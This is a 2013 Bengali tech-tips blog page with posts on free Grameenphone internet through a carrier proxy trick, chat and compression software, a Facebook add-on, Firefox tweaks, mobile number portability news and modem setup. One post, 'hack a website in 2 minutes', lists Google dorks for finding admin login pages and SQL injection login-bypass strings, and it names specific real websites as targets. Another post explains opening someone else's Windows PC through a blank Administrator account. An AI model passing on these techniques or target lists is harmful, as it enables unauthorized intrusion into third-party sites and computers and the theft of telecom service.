ads

Saturday, May 18, 2013

3

Grameenphon free internet without software ফ্রি ইন্টারনেট ব্যবহার করুন পিসিতে ব্রাউজ করুন, ফেসবুক সহ অনেক সাইট, কোন প্রকার সফটওয়ার ছাড়াই ফুলস্পিডে ।

  • Saturday, May 18, 2013
  • bdsolve
  • যা যা লাগবেঃ একটি গ্রামীনফোনের সিমকার্ড, একটি পিসি বা ল্যাপটপ ও মডেম
    প্রথমে আপনার গ্রামীনফোনের সিমকার্ডটিতে ৩৫ টাকা ফ্লেক্সিলোড করুন এবার p7 টাইপ করে পাঠিয়ে দিন ৫০০০ নাম্বারে , ১৫ দিনের জন্য প্যাকেজ চালু হয়ে যাবে অথবা ১১ টাকায় p10 চালূ করুণ ৭ দিনের জন্য । মনে রাখবেন ঐ সিমে এই ১৫ দিনের জন্য প্যাকেজ চলাকালীন কোন বাড়তি টাকা লোড দিবেন না তাহলে টাকা কেটে নিবে ।
    এবার আপনার জিপি মডেম ওপেন করে Tools ক্লিক করুন , এবার Options ক্লিক করুন
    FREE net 1
    এবার Profile Management ক্লিক করে New ক্লিক করুন ।
    FREE NET 2
    প্রোফাইল বানান Profile Name দিবেন Gp MMs এবার Static মার্ক করে নিচের মত করে Apn লিখুন gpmms তারপর Access Number *99# দেয়া থাকবে , না দেয়া থাকলে দিয়ে Save ক্লিক করে ওকে ক্লিক করে বের হয়ে আসুন ।
    free net 3
    এবার ফায়ারফক্সে Tools মেনু থেকে options এ যান ।
    fire fox 3
    এবার Advanced > Network>Settings ক্লিক করুন ।
    fire fox 4
    Manual Proxy Configuaration মার্ক  করে আইপি দিন 10.128.001.002 পোর্টে 8080 বসিয়ে Use This Proxy Server For All Protocol এ টিক দিয়ে Ok করে বের হয়ে আসুন ।
    fire fox 5
    এবার আপনার মডেম ওপেন করে Gp Mms দিয়ে Connect করুন ।
    free net6
    এবার ব্রাউজ করার পালা মনে রাখবেন ওয়েবের ঠিকানা দেয়ার আগে https:// ব্যবহার করবেন যেমন https://bdsolve.blogspot.com এভাবে যেতে হবে ।

    মনে রাখবেন http:// দিয়ে এই পদ্ধতি কাজ করবে না , https:// সাইটগুলো যেমন : ফেসবুক, গুগল , ইউটিউব সহ অসংখ্য সাইটে https:// পদ্ধতি কাজ করবে ।
    কাজ হলে বন্ধুদের শেয়ার করতে ভুলবেন না ও কোন সমস্যা হলে বা ভাল লাগলে কমেন্টস করবেন অবশ্যই ।
    Read more

    Monday, May 13, 2013

    2

    Facebook সহ পৃথিবীর সব বিখ্যাত সোস্যাল সাইটে এখন চ্যাট করুন মাত্র একটি সফটওয়্যার দিয়ে।চ্যাট করার সময় কোন মেগাবাইট কাটে না।

  • Monday, May 13, 2013
  • bdsolve
  • ফেসবুক সহ পৃথিবীর সব সোস্যাল সাইটগুলোতে চ্যাট করুন একই সাথে। আপনার হয়ত অনেকেই ভাবতে পারেন। চ্যাটতো ফেসবুক ওপেন করেই করা যায়। কিন্তু এই সফটওয়্যার টার সুবিধা হল ফেসবুক বা অন্য কোন ওয়েবসাইটে চ্যাট করার জন্য আপনার আলাদা করে ঐ ওয়েবসাইটের পেজ ওপেন করে রাখার কোন দরকার নেই। তাছাড়া যাদের সারাদিন ফেসবুকের হোম্পেজ খুলে বসে থাকার সময় নেই তাদের জন্য এটি অত্যন্ত জরুরি। কারন এর দ্বারা তারা থাকবেন সবসময় অনলাইন।
    তাহলে এবার আমি যে মহান সফটওয়্যার এর কথা বলছিলাম সেটার কথা বলি। সফটওয়্যারটির নাম Pidgin যার বাংলা অর্থ কবুতর। এই সফটওয়্যার এর ফিচারগুলো নিচে লিখলাম।
    # সম্পূর্ণ ফ্রি।
    # ওপেন সোর্স সফটওয়্যার।
    # এই একটি সফটওয়্যার থেকেই আপনি যেসব ওয়েবসাইটে চ্যাট করতে পারবেন সেগুলো হল AIM, Bonjour, Facebook, Gadu-Gadu, Google Talk, Nimbuzz, Group Wise, ICQ, IRC, MSN, MX It, My Space, SILC, Simple, Sametime, XMPP, Yahoo এবং Yahoo Japan।
    # আপনি একাধিক একাউন্টে লগইন করলেও সব ফ্রেন্ড একই ফ্রেন্ডলিস্টে শো করবে। অর্থাৎ ধরুন আপনি একসাথে ফেসবুক এবং গুগল টক দুটোতে লগইন করলেন, তখন আপনার ফেসবুক এবং গুগল টক এর ফ্রেন্ডদের কে একই ফ্রেন্ডলিস্টে দেখানো হবে। তাই আপনি আরাম করে দুটো একাউন্ট একসাথে রান করতে পারবেন।
    # অত্যন্ত ফাস্ট।
    # চ্যাট করার সময় কোন মেগাবাইট কাটে না।
    আরো মেলা কিছু…
    তাহলে দেরি না করে নিচের লিঙ্ক থেকে নামিয়ে নিন Pidgin সম্পূর্ণ বিনামুল্যে
    http://www.pidgin.im/download/
    Offline ভার্শনটা নামালে ভাল হয়। নামিয়ে ইন্সটল করে নিন। এবার এই লিঙ্ক থেকে Facebook Plugin For Pidgin নামিয়ে নিন
    Pidgin Facebook Plugin_upped_by_shovik_chowdhury.zip
    Read more

    Friday, May 10, 2013

    2

    ১ জিবি ফাইল কে ১০ এমবি করে নেন !!! দুইটি উপায় !!

  • Friday, May 10, 2013
  • bdsolve
  • সিস্টেম নাম্বার ১:

    KGB দিয়ে কিভাবে ১০ জিবি ফাইলকে ১০ এমবি করতে হয়
    কাজ শুরু করার আগে প্রথমে সফটওয়্যারটি ডাউনলোড করে নিন ।

    ডাউনলোড করার জন্য ক্লিক করুন >>
    MediaFire Download Link>>

    ডাউনলোড করা হয়ে গেলে ,এইবার ইন্সটল করে নিন ।মনে করি ইন্সটল করা হয়ে গেছে :D
    ডেক্সটপ এর আইকন কে ডাবল ক্লিক করে ওপেন করুন >নিচের পিক টা দেখুন


    * এবার Compress files”  ক্লিক করে  “Next” ক্লিক করুন

    * এখন KGB তে ক্লিক করে  ADD DIRECTORY ক্লিক করুন
    ফটো টা দেখুন






    Next এ ক্লিক করুন


    এখন দেখুন কাজ চলছে ,তাই একটু ওয়েট করুন , কিছু ক্ষণ পড় দেখবেন কম্প্রেড শেষ হয়ে যাবে, এই ভাবে আপনি যত খুশি করতে পারবেন ।
    এইতো গেলো সিস্টেম একটা :D

    সিস্টেম নাম্বার দুই:

    এইবার দেখাবো কিভাবে 7zip দিয়ে ১০ জিবি ফাইলকে ১০ এমবি করতে হয় :D

    প্রথমে ডাউনলোড  করে ইন্সটল করে নিন , ডাউনলোড করতে নিচে ক্লিক করুন ।
    ডাউনলোড করুন

    মনে করি ইতিমধ্যে আপনি ডাউনলোড করে ইন্সটল করেছেন :P
    তাহলে এখন আসল কাজে আসা যাক । যেই ফাইলকে কম্প্রেস করতে চান,ঐ ফাইলটার উপরে মাউস রেখে রাইট ক্লিক করে,পিক টা দেখুন

    নিচের ফটো টা দেখুন


    আপনি চাইলে পাসওয়ার্ড ও রাখতে পাড়েন । এছাড়া আরো অনেক কিছুই করতে পাড়েন ।
    এখন ওকে ক্লিক করুন ,কিছু ক্ষণ ওয়েট করুন ,ফাইল নিজে নিজে কম্প্রেস হবে ।
    Read more

    Wednesday, May 8, 2013

    1

    ফেইসবুক এ কেউ আনফ্রেন্ড করলে জানতে পারবেন ছোট্ট একটি অ্যাড অনস এর মাধ্যমে

  • Wednesday, May 8, 2013
  • bdsolve
  •  ফেইসবুক এখন পৃথিবীর ১ নম্বর সোশ্যাল মিডিয়া সাইট। প্রায় সব ইন্টারনেট ইউসার ফেইসবুক এর মাধ্যমে ফ্রেন্ডএর সাথে কানেক্ট রয়েছে। ইটা আমরা জানি যে কোনো ফ্রেন্ড যদি আমাদের আনফ্রেন্ড করে সেটা আমরা জানতে পারিনা এবং সেটা ফেইসবুক notify এর মাধ্যমে জানায় না। তাই আমরা জানতে পারিনা যে কোন ফ্রেন্ড আমাদের ছেড়ে চলে গেছে। আজকে আমি আপনাদের সাথে যেটা শেয়ার করব সেটা আপনাদের কে জানিয়ে দিবে যে কোন ফ্রেন্ড আপনাকে আনফ্রেন্ড করেছে।
    The all features according to developer:
    Unfriend Notifications!
    যখন কেউ আপনাকে আনফ্রেন্ড করবে আপনি নোটিফিকেশন এর মাধ্যমে জানতে পারবেন যে কত জন আপনাকে আনফ্রেন্ড করেছে।
     ফেইসবুক এ কেউ আনফ্রেন্ড করলে জানতে পারবেন ছোট্ট একটি অ্যাড অনস এর মাধ্যমে
    Account Deletion Notices!
    আনফ্রেন্ড নোটিফিকেশন ছাড়াও এর মাধ্যমে আপনি জানতে পারবেন যে, কেউ যদি তার ফেইসবুক এর প্রোফাইল delete করে বা ফেইসবুক এর প্রোফাইল কোনো রকমের পরিবর্তন আনে তাহলেও আপনি নোটিফিকেশন এর মাধ্যমে জানতে পারবেন।
    এটি আপনি নিশ্চিন্তে ব্যবহার করতে পারবেন। এটি আপনি এখান থেকে ডাউনলোড করতে পারবেন –
     ফেইসবুক এ কেউ আনফ্রেন্ড করলে জানতে পারবেন ছোট্ট একটি অ্যাড অনস এর মাধ্যমে
    এটি ডাউনলোড করার পর ইনস্টল করার পর আপনি যেই ভাবে ফেইসবুক চালান সেই ভাবেই চালাবেন শুধু মেনু বারে একটি মেনু অতিরিক্ত যোগ হবে।
    এটি 100% Safe & Secure!
    করলাম।
    Read more

    Thursday, May 2, 2013

    1

    লগইন পাসওয়ার্ড না যেনেই, কম্পিউটার ওপেন করুন

  • Thursday, May 2, 2013
  • bdsolve
  • পাসওয়ার্ড যদি কেহ ব্যবহার করে তাহলে তার পাসওয়ার্ড ছাড়া আপনি কি ভাবে কারো পিসি ওপেন করে ব্যবহার করবেন, তাহলে শুরু করুন প্রথমে আপনি যে কম্পিউটারটি ওপেন করে ব্যবহার করতে চান তার কম্পিউটারে লাইন (পওয়ার) দিন এবং পিসি যখন ওপেন হবার সময় আপনার কাছে পাসওয়ার্ড চানে নিচের ছবিটির মত।
    পিক্সার-০১।
    Administrator login photoAdministrator login photo
    তখন আপনি পাসওয়ার্ড না দিয়ে কিবোর্ড থেকে Ctrl+Alt চেপে ধরুন এবং Delete বাটনে পরপর দুইবার চাপ দিন তাহলেই আপনার সামনে একটি ডায়লক বক্স আসবে বক্সটি আসার পরে দেখুন উপরে একটি কম্পিউটার ব্যবহার কারীর নাম আছে এবং নিচের ঘরে পাসওয়ার্ড চাইতেছে, তাহলে এখানে আপনি উপরের গরের নামটি কেটে দিন এবং উপরের ঘরে লিখুন administrator লিখে নিচের ঘর খালি রাখুন এবং ওকে দিন, তাহলেই  দেখবেন আপনার সামনে কম্পিউটারটি ওপেন হয়ে গেছে। আবার যারা যানে এই বিষয়ে তারা আবার administrator এ পাসওয়ার্ড দিয়ে রাখে, আর যদি আপনি administrator লিখার পরে দেখেন যে ওপেন হয় না, তাহলে আপনার administrator লেখাটি চেক করুন কোন অক্ষর লেখা আপনার ভুল হয়েছে কিনা, যদি না হয় তাহলে বুঝবেন সে administrator তে পাসওয়ার্ড ব্যবহার করেছে, আর administrator পাসওয়ার্ড ব্যবহার করে থাকলে তাহলে আপনি ওপেন করতে পারবেন না।
    Read more
    1

    “আপনার firefox browser এর browsing গতি বাড়ান”

  • bdsolve
  • address bar এ about:config লিখে enter চাপতে হবে । network.http.pipelining এর মান true দিতে হবে ।এইরকম ভাবে network.dns.disableIPV6 এবং plugin.expose_full_path এর মান true দিতে হবে ।true করতে হলে preference এর উপর ডাবল ক্লিক করতে হবে । তারপর network.http.pipelining.maxrequests এর মান 4 এর বদলে ৪ করতে হবে ।মান বসাতেও preference এর উপর ডাবল ক্লিক করে মান বসাতে হবে । এবার nglayout.intialpaint.delay নামের নতুন preference তৈরি করতে হবে এবং এর মান দিতে হবে 0। preference তৈরি করতে mouse এর ডান বাটন এ ক্লিক করে new এ ক্লিক করে ডান থেকে string/integer/boolean নির্বাচন করতে হবে তারপর preference এর নাম লিখে enter করতে হবে। তার পরবর্তী window তে value লিখে ok করতে হবে। একই ভাবে content.notify.backoffcount নামে নতুন integer preference তৈরি করে মান দিতে হবে 5 । তারপর vi.submenudelay নামে নতুন integer preference তৈরি করে মান দিতে হবে 7
    content.max.tokenizing.time নামে নতুন integer preference তৈরি করে মান দিতে হবে 2250000 । তারপর content.notify.interval নামে নতুন integer preference তৈরি করে মান দিতে হবে 750000 . browser.cache.memory.capacity name notun integer preference তৈরি করে মান দিতে হবে 65536 ।এইবার content.interrupt.parsing এবং content.notify.ontimer নামে boolean preference তৈরি করে মান true দিতে হবে।
    তাহলেই কাজ সম্পন্ন……
    Read more

    Monday, April 29, 2013

    1

    মোবাইল নম্বর ঠিক রেখেই অন্য অপারেটরে যেতে পারবে গ্রাহক

  • Monday, April 29, 2013
  • bdsolve

  • mobile-numberবাংলাদেশ টেলিযোগাযোগ নিয়ন্ত্রণ কমিশন বিটিআরসি আগামী ছয় মাসের মধ্যে মোবাইল নাম্বার পোর্টেবিলিটি বা এমএনপি চালু করার জন্যে কাজ শুরু করেছে। আগামী সপ্তাহে অনুষ্ঠিত কমিশন বৈঠক থেকেই এ বিষয়ে অপারেটরদের নির্দেশ দেওয়া হবে বলে জানিয়েছে বিটিআরসি’র সংশ্লিষ্ট বিভাগগুলো।

    বিটিআরসি’র চেয়ারম্যান ইতিমধ্যে এ সংশ্লিষ্ট আয়োজন করতে বিটিআরসি’র কর্মকর্তাদের নির্দেশনা দিয়েছেন বলে জানা গেছে।
    তবে বিটিআরসি’র এক নির্ভরযোগ্য সূত্র জানান, নাম্বার পোর্টেবিলিটি আধুনিক সেবা প্রযুক্তির অন্যতম হাতিয়ার। এ বিষয়ে সিদ্ধান্ত নিয়েছে বিটিআরসি। তবে কবে থেকে এটি কার্যকর করা হবে এ বিষয়ে তারা এখনো কোনো সিদ্ধান্ত নেয়া হয়নি।
    ২০০৮ সাল থেকে নাম্বার পোর্টেবিলিটির জন্যে কাজ করছে বিটিআরসি। এর মধ্যে গত বছর ৮ জানুয়ারি জাতীয় সংসদের টেলিযোগাযোগ মন্ত্রনালয় সম্পর্কিত সংসদীয় কমিটি এক বছরের মধ্যে বিটিআরসিকে এমএনপি বাস্তবায়নের নির্দেশ দেয়।
    কিন্তু তারপরে এক বছরেরও বেশী সময় চলে গেলেও এমএনপি বাস্তবায়ন করা সম্ভব হয়নি।
    এ বিষয়ে সংশ্লিষ্টরা জানিয়েছেন, এর আগে একাধিকবার নীতিমালা করা হলেও এখন আর এর জন্যে আলাদা নীতিমালার প্রয়োজন হবে না। টু জি লাইসেন্স নবায়নের নীতিমালার মধ্যেই এ বিষয়টি অন্তর্ভূক্ত করে দেওয়া আছে।
    যার ফলে এখন কেবল একটি নির্দেশিকা তৈরী করে সেটি অপারেটরদের দিলেই তারা তা বাস্তবায়ন করতে বাধ্য থাকবেন।
    তবে বৃহস্পতিবার এক সংবাদ সম্মেলনে গ্রামীণফোনের সিইও বিবেক সুদ বলেছেন, ‘তারা এমএনপি’র বিপক্ষে। কারণ এর ফলে নতুন অপারেটরদের সম্ভাবনা বাড়লেও তারা খানিকটা হলেও ঝুঁকিতে পড়বেন’।
    অন্যদিকে এয়ারটেলের কর্পোরেট বিভাগের প্রধান আশরাফুল হক চৌধুরী বলেছেন, ‘এর আগে দফায় দফায় তারা এমএনপি’র বিষয়ে দাবি জানালেও শেষ পর্যন্ত এটি আধারেই থেকে গেছে। এখন অনেক বিলম্ব হয়ে গেলেও এটি বাস্তবায়িত হলে তাতে গোটা দেশেরই লাভ হবে’।
    এমএনপি: এমএনপি হল মোবাইল ফোন গ্রাহকের আগের নম্বর বিদ্যমান রেখেই ইচ্ছে মতো অপারেটর বেছে নেওয়ার সুযোগ। এক্ষেত্রে কোনো গ্রাহক তার বর্তমান অপারেটরের সেবায় সন্তুষ্ঠ না হলে তার আগের নম্বর ঠিক রেখেই তিনি নতুন কোনো অপারেটরে চলে যেতে পারবেন।
    অর্থাৎ, কারো যদি এয়ারটেলের নাম্বার থাকে, এবং তিনি গ্রামীণফোনে যেতে চান, তাহলে তিনি তাঁর নাম্বারটি পরিবর্তন না করেই গ্রামীণফোনের সেবা নিতে পারবেন।
    ভারতে এই পরিবর্তনের জন্যে ১৯ রুপী করে খরচ করতে হয়। থাইল্যান্ডে খরচ করতে হয় ৯৯ বাথ করে। তবে মালয়েশিয়াতে এটি ফ্রি। ভারতে তৃতীয় অপর একটি কোম্পানি এমএনপি’র কাজ করে দিলেও বাংলাদেশের অপারেটরগুলো এর বিপক্ষে বলছে। ফলে নিজেদেরকেই এখন প্রযুক্তি স্থাপন করতে হবে।
    মার্কিন যুক্তরাষ্ট্র, অস্ট্রেলিয়া, জার্মানি, ব্রাজিলসহ অনেক দেশেই এখন এমএনপি আছে। পাশের দেশ ভারত ২০০১ সালে এই প্রযুক্তি গ্রহন করেছে। পরে পাকিস্তান এবং শ্রীলংকাও এমএনপি’র বাস্তাবায়ন করেছে।
    Read more

    Friday, April 26, 2013

    0

    ২ মিনিটে হ্যাক করুন ওয়েবসাইট

  • Friday, April 26, 2013
  • bdsolve
  • ২ মিনিটে হ্যাক করুন ওয়েবসাইট। না দেখলে মিস করবেন।
    আসুন শিখে ফেলি কিভাবে ২ মিনিটে একটা ওয়েবসাইট হ্যাক করতে হয়।
    প্রথমে মামার কাছে যান… http://www.google.com এ।
    এবার Search করুন নিচের থেকে যে কোন একটা Google dork লিখে।
    “inurl:admin.asp”
    “inurl:adminlogin.php”
    “inurl:adminhome.php”
    “inurl:admin_login.php”
    “inurl:admin/login.asp”
    “inurl:adminlogin.asp”
    “inurl:adminhome.asp”
    “inurl:admin_login.asp”
    “inurl:administratorlogin.asp”
    “inurl:login/administrator.asp”
    “inurl:administrator_login.asp”
    “inurl:admin.php”
    “inurl:login/admin.php”
    “inurl:admin/login.php”
    “inurl:administratorlogin.php”
    “inurl:login/administrator.php”
    “inurl:administrator_login.php”
    এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
    যদি ইন্দিয়ার সাইট খুজতে চান তাহলে dork এর আগে লিখুন ইন্ডিয়া। যেমন india”inurl:adminlogin.asp”
    যে কোন একটি সাইটে প্রবেশ করুন।
    এখানে username দিনঃ Admin
    তারপর নিচের থেকে যেকোনো একটা পাসওয়ার্ড দিন।
    'or'1'='1 admin admin123 admin1234 ' or '1'='1
    ' or 'x'='x
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    'or'1=1'
    তাহলে আপনার লগইন form হবে নিচের মত
    username:Admin
    password:'or'1'='1
    মনে রাখবেন যে বেশির ভাগ সাইট এর পাসওয়ার্ড হয় ‘or’1=1′ এবং admin
    আর যে সাইট গুলো valuable ওই সাইট গুলো হ্যাক করতে পারবেন।
    আপনাদের জন্য কিছু সাইট দিলাম । এবার আপনারা অ্যাডমিন প্যানেল এ যান এবং যা ইচ্ছা করতে পারেন।
    1.http://www.amskrupajal.org/adminlogin.asp
    user: admin
    pass: ‘or”=’
    2.www.lhhb.com/admin/login.asp
    3.www.udesa.co.za/admin/login.asp
    4.http://www.krupajalgroup.org/AdminLogin.asp
    এখন ইচ্ছা মত সাইট হ্যাক করুন। ভাল থাকবেন সবাই।

    Read more

    Tuesday, April 23, 2013

    1

    উইন্ডোজে গ্রামীনফোনের মোডেম দিয়ে টেলিটক ৩জি সার্ভিস চালু করুন সহজে

  • Tuesday, April 23, 2013
  • bdsolve
  • আমি আমার উইন্ডোজ ৮ এ গ্রামীনফোনের ZTE MF190 মোডেম দিয়ে টেলিটক ৩জি সার্ভিস ব্যবহার করি। কিভাবে ????? নিচে দেখুন।

    সবুজ বক্স করা জায়গাটায় খেয়াল করুন। আপনার মোডেমে যদি দেখতে পান এরকম কিছু তাহলে আলহামদুলিল্লাহ বলেন। আপনার মোডেমে টেলিটক ৩জি সার্ভিস চালানো যাবে। টেলিটক ৩জি ব্যবহার করে এইচএসডিপিএ নেটওয়ার্ক। টেলিটক ৩জি ও তার ফ্লাস মোডেম সম্পর্কে আরো বিস্তারিত জানতে এই লিঙ্কে যান (http://www.androidkothon.com/post-id/2585)
    এই টিউটোরিয়ালটির জন্য আমি ব্যবহার করেছি।
    ১. গ্রামীনফোনের ZTE MF190 মোডেম

    ২. উইন্ডোজ ৮ (৬৪ বিট)
    ৩. টেলিটক ৩জি সিম (১২৮কে)
    ৪. আমার ল্যাপটপ (ACER ASPIRE V3-571)
    আচ্ছা এখন আবার কাজে আসা যাক। নিচের ছবি গুলি ফলো করেন।


    “Profile Management “ এ গিয়ে ADD বাটনে ক্লিক করুন। নিচের ছবির মত।


    Just Type Access Number/Dial Number:*99# Then Press OK আপনি আডভান্স ইউজার হয়ে থাকলে এই লিঙ্কে যান (http://bmion.blogspot.com/2013/03/use-teletalk-3g2g-sim-at-gp-modem.html)
    আডভান্স ইউজারদের জন্য আরেকটা ইমেজ দেয়া হল। দয়া করে কনফার্ম করবেন এটা

    এখন এরকম কিছু একটা দেখবেন।

    কানেক্ট করে ইন্টারনেট ব্যাবহার করা শুরু করেন।আর মোডেম থেকে Text Message করে নিচের ইনফর্মেশন গুলি জানতে পারেন।
    • ডাটা ইউজ জানার জন্য u লিখে 111 এ এসএমএস করুন।
    • ব্যালেন্স জানার জন্য b লিখে 152 তে এসএমএস করুন।
    • কার্ড রিচার্জ করার জন্য ১৩ ডিজিটের পিন লিখে 151 এ এসএমএস পাঠান (কার্ড রিচার্জ করার ব্যপারটা টেস্ট করে দেখি নাই। আমি টপ-আপ করি সব সময়)
    Read more